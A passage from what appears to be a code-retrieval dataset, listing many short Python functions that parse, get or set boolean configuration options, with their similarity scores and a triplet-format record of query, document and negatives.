"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def bool_option (arg: Any) -> bool:\n return True",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def getboolean(self, option):\n return getboolean(self.name, option)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def boolean_option_action(option,opt_str,value,parser):\n #print \"Processing %s\" % (opt_str)\n setattr(parser.values,option.dest,True)",
"def get_bool(self, option, argument=None):\n return bool(self.get(option, argument))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def getboolean(self, option, default=None):\n\t\treturn self._get_raw(option, 'boolean', default)",
"def getboolean(self, section, option):\n value = self.get(section, option)\n if str(value).lower() in ('1', 'yes', 'true', \"on\"):\n return True\n if str(value).lower() in ('0', 'no', 'false', 'off'):\n return False\n raise ValueError('cannot use it as a boolean value')",
"def set(self, boolean):\n self._val = boolean",
"def option_bool(argument: Optional[str]) -> bool:\n if argument and argument.strip():\n output = tinydocutils.directives.choice(argument, (\"true\", \"false\"))\n return output == \"true\"\n return True",
"def get_bool(options, name, default=False):\n value = options.get(name)\n if not value:\n return default\n if value.lower() == 'true':\n return True\n elif value.lower() == 'false':\n return False\n else:\n raise zc.buildout.UserError(\n \"Invalid value for %s option: %s\" % (name, value))",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def bool_flag(s):\n if s.lower() in ['off', 'false', '0']:\n return False\n if s.lower() in ['on', 'true', '1']:\n return True\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag (0 or 1)\")",
"def getbool(option, default = None):\n\treturn _cfg.getboolean('rosshm', option, fallback = default)",
"def cmakeBoolOptionIsSet(self, opt):\n\n if self.envcmake.has_key( opt ):\n\n val = str(self.envcmake.get(opt,\"\"))\n\n if val == \"1\" or val == \"ON\" or val == \"YES\":\n\n return True\n\n return False",
"def getbool(self, section, option, default=None):\r\n return self.get(section, option, type=bool, default=default)",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def getboolean(self, option, default = None, section = None):\n v = self.get(option, default, section)\n if isinstance(v, str):\n v = v.lower()\n if v not in self.cfg._boolean_states:\n raise ValueError, \"Not a boolean: %s\" % v\n v = self.cfg._boolean_states[v]\n return v",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def option_default_true(arg: Any) -> bool:\n\n if isinstance(arg, bool):\n return arg\n\n if arg is None:\n return True\n\n sanitized = arg.strip().lower()\n\n if sanitized == \"true\":\n return True\n elif sanitized == \"false\":\n return False\n else:\n raise ValueError(f\"Directive option argument '{arg}' is not valid. \"\n f\"Valid arguments are 'true' or 'false'.\")",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def bool_flag(s):\n FALSY_STRINGS = {\"off\", \"false\", \"0\"}\n TRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def register_bool(self, name, short=None, default=None, group=None, help=None):\n self._register(name, self._parse_bool, short=short, default=default,\n group=group, help=help)",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def opt_option(self, option):\n if \"=\" in option:\n path, value = option.split(\"=\")\n self.setOverride(\n DEFAULT_CONFIG,\n path.split(\"/\"),\n value,\n self.overrides\n )\n else:\n self.opt_option(\"{}=True\".format(option))",
"def setOption(self, pluginOptionDict):\n return True",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def opt_option(self, option):\n\n if \"=\" in option:\n path, value = option.split('=')\n self._setOverride(\n DEFAULT_CONFIG,\n path.split('/'),\n value,\n self.overrides\n )\n else:\n self.opt_option('%s=True' % (option,))",
"def is_bool(self):\n validator = self.__class__.get_setting_validator(self.key, **self.get_kwargs())\n\n return self.__class__.validator_is_bool(validator)",
"def getBoolean(self, section, option, default=False):\n return self.get(section, option, default, _bool)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def config_get_bool(section, option):\n return __CONFIG.getboolean(section, option)",
"def get_bool(section, option, default=False):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tif res.lower() == \"true\" or res == \"1\":\n\t\treturn True\n\n\treturn default",
"def get_bool(self, sect, opt):\r\n return self.get_safe(sect, opt) == \"True\"",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def argparse_bool(x):\n return str(x).lower() in {'true', '1', 'yes'}",
"def boolean_flag(parser, name, default=False, help=None):\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)",
"def parse_bool(section, optionname):\n string = section.dict[optionname]\n if string.lower() == \"true\" or string.lower() == \"yes\":\n return True\n elif string.lower() == \"false\" or string.lower() == \"no\":\n return False\n elif string.isdigit():\n return bool(int(string))\n else:\n raise ValueError(\"Option \" + optionname + \" in section \" + section.name\n + \" is not a valid boolean!\")",
"def getBooleanOption(aConfig, aSection, aOption):\n if aConfig.has_option(aSection, aOption):\n return aConfig.getboolean(aSection, aOption)\n else:\n # Default value. This should match the initialization done in\n # __init__ of class task in taskHandler.py\n if (aOption == \"fullScreenMode\" or\n aOption == \"formatOutput\" or\n aOption == \"compressOutput\"):\n return True\n else:\n # \"useWebDriver\"\n # \"runSlowTests\"\n # \"runSkipTests\"\n # \"useGrid\"\n return False",
"def bool_attr(attr):\n if attr.lower() == \"true\":\n val = True\n elif attr.lower() == \"false\":\n val = False\n else:\n raise EzXMLError(\"Must be \"\\\n \"'true' or 'false'. Not %s\" % (attr))\n return val",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value",
"def explicit_bool(value: bool) -> bool:\n return value",
"def _boolean_callback(self, *args):\n\t\tnew_value = args[1].get_boolean()\n\n\t\targs[0].set_state(GLib.Variant.new_boolean(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def bool_to_on_off(boolean: bool):\n if boolean:\n return \"on\"\n return \"off\"",
"def writeAttributeBool(self, *args):\n return _libsbml.XMLOutputStream_writeAttributeBool(self, *args)",
"def add_boolean(self, name, **kwargs):\n self.add(Flags.BooleanFlag(name, **kwargs))",
"def getBoolValue(self):\n return _libsbml.ConversionOption_getBoolValue(self)",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"def Bool(arg):\n return arg.lower() in ('y', 'true', 't', '1')",
"def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def boolean(self, boolean):\n\n self._boolean = boolean",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def restricted_bool(x):\n try:\n x = bool(x)\n except ValueError:\n raise argparse.ArgumentTypeError(\"%r not a bool literal\" % (x,))\n return x",
"def get_bool(self, name, default=False):\n return self.get_as(self.parse_bool, name, default, value_type=bool)",
"def set_flag(self, set_flag):\n\n self._set_flag = set_flag",
"def read_boolean_option(config, section, option):\n if not config.has_section(section):\n return\n\n return config.has_option(section, option)",
"def boolean(self, label, component, config, name, default=False):\n\n default = self.setting(config, name, default)\n return st.checkbox(label, value=default, key=component + name)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def bool_flag(s):\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def set_option(name, option):\n ffi.lib.LLVMPY_SetCommandLine(_encode_string(name),\n _encode_string(option))",
"def str2bool(v) -> bool:\n\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(bool_arg):\n if bool_arg.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif bool_arg.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise ValueError(f'Boolean argument expected. Got {bool_arg} instead.')",
"def setOption(self, name, value):\n petsc.optionsSetValue(name, value)\n return",
"def SetFlag(self, flag, option_state):\r\n \r\n state = self.state\r\n \r\n if option_state:\r\n state |= flag\r\n else:\r\n state &= ~flag\r\n\r\n self.state = state\r\n\r\n if flag in [self.buttonClose, self.buttonMaximize, self.buttonMinimize, self.buttonPin]:\r\n self.ResetButtons()\r\n \r\n return self",
"def flag_set(self, flag):\n if self.flags & flag != 0:\n return True\n else:\n return False",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def get_attr_bool(self, name, default=False):\n v = self.get_attr(name)\n if v is None:\n return default\n if v.lower() in [\"t\", \"true\", \"y\", \"yes\", \"1\"]:\n return True\n else:\n return False",
"def _prep_bool_arg(arg):\n return bool(strtobool(str(arg)))",
"def get_bool(self, key, default):\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def bool_value(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"bool_value\")",
"def on_off_bool(value):\n return value == 'on'",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def set_option(k, v=\"True\"):\n if k == \"log\":\n OPTIONS_TABLE[k] = getattr(logging, v.upper(), None)\n elif k == \"backend\":\n OPTIONS_TABLE[k] = sdm_backends.Backends.get_backend_name(v)\n elif k == \"config\":\n OPTIONS_TABLE[k] = sdm_util.get_abs_path(v)",
"def set_option(self, dest, value, force=True):\r\n if hasattr(self._option_values, dest) and not force:\r\n return\r\n setattr(self._option_values, dest, value)",
"def str2bool(v):\n if v.lower() == 'true':\n return True\n elif v.lower() == 'false':\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(arg):\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n raise argparse.ArgumentTypeError(\"Expected 'True' or 'False'.\")",
"def is_bool(self):\n answer = self._call('is_bool')\n return answer.yes",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')"
] | [
"0.81047094",
"0.7505482",
"0.72757864",
"0.72743803",
"0.70943683",
"0.705241",
"0.70266336",
"0.70084757",
"0.6970434",
"0.6921304",
"0.6904598",
"0.68884057",
"0.6847308",
"0.6807809",
"0.67250526",
"0.6707975",
"0.6671484",
"0.664038",
"0.66249967",
"0.6597783",
"0.651423",
"0.65032226",
"0.6467936",
"0.64536244",
"0.64346325",
"0.6423603",
"0.6385956",
"0.63799703",
"0.636212",
"0.6358862",
"0.63382375",
"0.6336264",
"0.63281167",
"0.63273937",
"0.6322064",
"0.6310586",
"0.62914115",
"0.6268994",
"0.62598103",
"0.62272274",
"0.6226767",
"0.62248677",
"0.62077576",
"0.6181871",
"0.6151472",
"0.6138179",
"0.61309224",
"0.61262757",
"0.6112616",
"0.61059684",
"0.60956436",
"0.60815",
"0.6065185",
"0.6057164",
"0.60273063",
"0.6021811",
"0.60124916",
"0.60037017",
"0.5995529",
"0.59951234",
"0.593159",
"0.59293365",
"0.5928432",
"0.5922593",
"0.59152263",
"0.58977544",
"0.5894333",
"0.5887994",
"0.5887036",
"0.5880179",
"0.5872852",
"0.5868595",
"0.58626956",
"0.58602226",
"0.585622",
"0.585152",
"0.5847893",
"0.58343893",
"0.5832523",
"0.580831",
"0.5808267",
"0.5806948",
"0.57901365",
"0.5779698",
"0.57780004",
"0.57780004",
"0.5768884",
"0.57676816",
"0.5766831",
"0.57611686",
"0.5751903",
"0.57467055",
"0.57390195",
"0.5735766",
"0.5732144",
"0.5725484",
"0.5723149",
"0.5706481",
"0.56815565",
"0.567936",
"0.567936"
] | 0.0 | -1 |
Set a bool option. | def set_bools(self, value, bools, limit):
for x in range(limit):
if value & 1 << x:
bools[x]['value'] = True
else:
bools[x]['value'] = False
pass | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def bool_option (arg: Any) -> bool:\n return True",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def getboolean(self, option):\n return getboolean(self.name, option)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def boolean_option_action(option,opt_str,value,parser):\n #print \"Processing %s\" % (opt_str)\n setattr(parser.values,option.dest,True)",
"def get_bool(self, option, argument=None):\n return bool(self.get(option, argument))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def getboolean(self, option, default=None):\n\t\treturn self._get_raw(option, 'boolean', default)",
"def getboolean(self, section, option):\n value = self.get(section, option)\n if str(value).lower() in ('1', 'yes', 'true', \"on\"):\n return True\n if str(value).lower() in ('0', 'no', 'false', 'off'):\n return False\n raise ValueError('cannot use it as a boolean value')",
"def set(self, boolean):\n self._val = boolean",
"def option_bool(argument: Optional[str]) -> bool:\n if argument and argument.strip():\n output = tinydocutils.directives.choice(argument, (\"true\", \"false\"))\n return output == \"true\"\n return True",
"def get_bool(options, name, default=False):\n value = options.get(name)\n if not value:\n return default\n if value.lower() == 'true':\n return True\n elif value.lower() == 'false':\n return False\n else:\n raise zc.buildout.UserError(\n \"Invalid value for %s option: %s\" % (name, value))",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def bool_flag(s):\n if s.lower() in ['off', 'false', '0']:\n return False\n if s.lower() in ['on', 'true', '1']:\n return True\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag (0 or 1)\")",
"def getbool(option, default = None):\n\treturn _cfg.getboolean('rosshm', option, fallback = default)",
"def cmakeBoolOptionIsSet(self, opt):\n\n if self.envcmake.has_key( opt ):\n\n val = str(self.envcmake.get(opt,\"\"))\n\n if val == \"1\" or val == \"ON\" or val == \"YES\":\n\n return True\n\n return False",
"def getbool(self, section, option, default=None):\r\n return self.get(section, option, type=bool, default=default)",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def getboolean(self, option, default = None, section = None):\n v = self.get(option, default, section)\n if isinstance(v, str):\n v = v.lower()\n if v not in self.cfg._boolean_states:\n raise ValueError, \"Not a boolean: %s\" % v\n v = self.cfg._boolean_states[v]\n return v",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def option_default_true(arg: Any) -> bool:\n\n if isinstance(arg, bool):\n return arg\n\n if arg is None:\n return True\n\n sanitized = arg.strip().lower()\n\n if sanitized == \"true\":\n return True\n elif sanitized == \"false\":\n return False\n else:\n raise ValueError(f\"Directive option argument '{arg}' is not valid. \"\n f\"Valid arguments are 'true' or 'false'.\")",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def bool_flag(s):\n FALSY_STRINGS = {\"off\", \"false\", \"0\"}\n TRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def register_bool(self, name, short=None, default=None, group=None, help=None):\n self._register(name, self._parse_bool, short=short, default=default,\n group=group, help=help)",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def opt_option(self, option):\n if \"=\" in option:\n path, value = option.split(\"=\")\n self.setOverride(\n DEFAULT_CONFIG,\n path.split(\"/\"),\n value,\n self.overrides\n )\n else:\n self.opt_option(\"{}=True\".format(option))",
"def setOption(self, pluginOptionDict):\n return True",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def opt_option(self, option):\n\n if \"=\" in option:\n path, value = option.split('=')\n self._setOverride(\n DEFAULT_CONFIG,\n path.split('/'),\n value,\n self.overrides\n )\n else:\n self.opt_option('%s=True' % (option,))",
"def is_bool(self):\n validator = self.__class__.get_setting_validator(self.key, **self.get_kwargs())\n\n return self.__class__.validator_is_bool(validator)",
"def getBoolean(self, section, option, default=False):\n return self.get(section, option, default, _bool)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def config_get_bool(section, option):\n return __CONFIG.getboolean(section, option)",
"def get_bool(section, option, default=False):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tif res.lower() == \"true\" or res == \"1\":\n\t\treturn True\n\n\treturn default",
"def get_bool(self, sect, opt):\r\n return self.get_safe(sect, opt) == \"True\"",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def argparse_bool(x):\n return str(x).lower() in {'true', '1', 'yes'}",
"def boolean_flag(parser, name, default=False, help=None):\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)",
"def parse_bool(section, optionname):\n string = section.dict[optionname]\n if string.lower() == \"true\" or string.lower() == \"yes\":\n return True\n elif string.lower() == \"false\" or string.lower() == \"no\":\n return False\n elif string.isdigit():\n return bool(int(string))\n else:\n raise ValueError(\"Option \" + optionname + \" in section \" + section.name\n + \" is not a valid boolean!\")",
"def getBooleanOption(aConfig, aSection, aOption):\n if aConfig.has_option(aSection, aOption):\n return aConfig.getboolean(aSection, aOption)\n else:\n # Default value. This should match the initialization done in\n # __init__ of class task in taskHandler.py\n if (aOption == \"fullScreenMode\" or\n aOption == \"formatOutput\" or\n aOption == \"compressOutput\"):\n return True\n else:\n # \"useWebDriver\"\n # \"runSlowTests\"\n # \"runSkipTests\"\n # \"useGrid\"\n return False",
"def bool_attr(attr):\n if attr.lower() == \"true\":\n val = True\n elif attr.lower() == \"false\":\n val = False\n else:\n raise EzXMLError(\"Must be \"\\\n \"'true' or 'false'. Not %s\" % (attr))\n return val",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value",
"def explicit_bool(value: bool) -> bool:\n return value",
"def _boolean_callback(self, *args):\n\t\tnew_value = args[1].get_boolean()\n\n\t\targs[0].set_state(GLib.Variant.new_boolean(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def bool_to_on_off(boolean: bool):\n if boolean:\n return \"on\"\n return \"off\"",
